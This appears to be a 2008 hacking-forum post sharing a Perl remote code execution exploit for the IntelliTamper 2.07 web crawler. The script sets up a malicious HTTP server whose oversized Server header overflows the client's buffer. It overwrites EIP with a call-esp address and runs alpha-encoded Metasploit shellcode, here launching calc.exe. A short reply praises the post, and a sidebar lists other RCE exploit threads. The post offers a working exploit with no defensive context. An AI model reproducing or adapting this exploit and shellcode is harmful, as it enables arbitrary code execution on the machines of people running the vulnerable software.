IntelliTamper 2.07 (server header) Remote Code Execution Exploit

**Wh!5t|eR** · 07-23-2008

IntelliTamper 2.07 (server header) Remote Code Execution Exploit

Quote:

#!/usr/bin/perl
#
# IntelliTamper 2.07 Remote Code Execution ( server header )
#
use IO::Socket;

my $msg="";
my $overflow = "A"x1536;
my $fun = "".
"\xb3\x8d\x95\x7c". # EIP (0x7C958DB3 call esp NTDLL.DLL)
"z3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca 9Cb0C". # More buffer.
"AAAA2Cb3Cb4CBBBB"; # Starts executing here

# win32_exec - EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2 The Metasploit Project
my $sh3llcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\ x49\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\ x51\x5a\x6a\x63".
"\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x73\x41\ x32\x41\x41\x32".
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x4b\ x59\x59\x6c\x6a".
"\x48\x70\x44\x35\x50\x65\x50\x73\x30\x6e\x6b\x33\ x75\x75\x6c\x4c".
"\x4b\x71\x6c\x53\x35\x74\x38\x55\x51\x78\x6f\x6e\ x6b\x62\x6f\x36".
"\x78\x6c\x4b\x53\x6f\x65\x70\x36\x61\x6a\x4b\x43\ x79\x6e\x6b\x76".
"\x54\x4e\x6b\x53\x31\x68\x6e\x64\x71\x6f\x30\x5a\ x39\x4e\x4c\x6e".
"\x64\x6f\x30\x71\x64\x75\x57\x78\x41\x38\x4a\x74\ x4d\x76\x61\x4f".
"\x32\x5a\x4b\x39\x64\x75\x6b\x43\x64\x67\x54\x74\ x44\x74\x35\x48".
"\x65\x6c\x4b\x73\x6f\x37\x54\x57\x71\x38\x6b\x70\ x66\x6e\x6b\x64".
"\x4c\x70\x4b\x4e\x6b\x33\x6f\x35\x4c\x64\x41\x38\ x6b\x4c\x4b\x37".
"\x6c\x4c\x4b\x76\x61\x58\x6b\x6c\x49\x43\x6c\x55\ x74\x56\x64\x4f".
"\x33\x44\x71\x4f\x30\x30\x64\x6c\x4b\x77\x30\x74\ x70\x6f\x75\x49".
"\x50\x50\x78\x36\x6c\x4c\x4b\x33\x70\x54\x4c\x6e\ x6b\x30\x70\x45".
"\x4c\x6e\x4d\x4c\x4b\x55\x38\x43\x38\x78\x6b\x44\ x49\x6e\x6b\x4b".
"\x30\x6c\x70\x45\x50\x65\x50\x75\x50\x4c\x4b\x41\ x78\x75\x6c\x51".
"\x4f\x30\x31\x7a\x56\x51\x70\x30\x56\x4f\x79\x38\ x78\x6c\x43\x6b".
"\x70\x71\x6b\x72\x70\x61\x78\x4a\x50\x4d\x5a\x43\ x34\x43\x6f\x43".
"\x58\x4c\x58\x49\x6e\x6c\x4a\x66\x6e\x43\x67\x69\ x6f\x48\x67\x43".
"\x53\x73\x51\x50\x6c\x41\x73\x66\x4e\x70\x65\x72\ x58\x71\x75\x37".
"\x70\x63";

my $overflow2 = "A"x1046;
my $buff = "$overflow$fun$sh3llcode";
my $resp = "".
"HTTP/1.1 200 OK\r\n".
"Connection: close\r\n".
"Content-Length: 8\r\n".
"Date: Mon, 21 Jul 2008 20

05 GMT\r\n".
"Content-Type: text/plain\r\n".
"Server: $buff\r\n".
"MIME-Version: 1.0\r\n\r\n".
"Exploit!\r\n";

my $sock = new IO::Socket::INET (LocalPort => '80', Proto => 'tcp', Listen => 1, Reuse => 1, );

print "Listening on port 80 for connections...\n";
my $new_sock = $sock->accept();
print "Got connection from client...\n";
my $sock_addr = recv($new_sock,$msg,190,0);
print "Sending client packet...\n";
print $new_sock "$resp";
print "Packet sent to client, voila?\n";
close($sock);
print "Socket closed\n";

**ZMist** · 07-23-2008

Keep It Up

07-23-2008	#2 (permalink)
ZMist Respected Member Join Date: Sep 2006 Location: Home Posts: 1,336 Thanks: 3 Thanked 21 Times in 14 Posts Rep Power: 115 Awards Showcase Total Awards: 1	Keep It Up __________________ CHECK To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. OUT

Thread Tools
Show Printable Version Email this Page
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode

Similar Threads
Thread	Thread Starter	Forum	Replies	Last Post
LoveCMS 1.6.2 Final Remote Code Execution Exploit	Wh!5t\|eR	Exploit Codes	0	08-07-2008 05:36 AM
TGS CMS Remote Code Execution Exploit	Wh!5t\|eR	Exploit Codes	0	08-04-2008 02:56 AM
XChat <= 2.8.7b (URI Handler) Remote Code Execution Exploit	Armageddon	Exploit Codes	0	08-02-2008 11:56 PM
Pligg <= 9.9.0 Remote Code Execution Exploit	Armageddon	Exploit Codes	3	08-01-2008 04:20 PM
IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit	Wh!5t\|eR	Exploit Codes	1	07-23-2008 08:27 PM

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)